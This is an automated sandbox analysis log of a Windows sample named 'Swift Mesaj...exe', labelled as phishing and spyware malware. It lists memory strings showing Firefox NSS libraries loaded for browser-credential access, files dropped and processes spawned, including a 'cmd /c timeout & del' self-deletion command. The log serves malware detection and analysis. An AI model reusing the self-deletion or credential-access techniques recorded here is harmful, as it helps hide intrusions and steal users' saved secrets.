Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019677898.000000001E6D8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973542131.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8061396771.00000000018CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7962442056.0000000000178000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7977493803.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7978161221.000000001DD08000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987166435.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7990657320.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015896144.000000001E660000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988349897.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020557418.000000001E704000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988556068.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976764480.000000001DD10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019253907.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7985166767.000000001DD1C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973403016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7967762388.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020892239.000000001DA90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019860859.000000001E6E8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7986103075.000000001DD08000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970112067.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984865306.000000001DD28000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7965459586.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Section loaded: crtdll.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: edgegdi.dll Jump to behavior
Source: Swift Mesaj#U0131#09971.exe Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File read: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Jump to behavior
Source: Swift Mesaj#U0131#09971.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\nsrF4CB.tmp Jump to behavior
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@8/55@2/2
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004020FE CoCreateInstance, 1_2_004020FE
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_004046E6
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
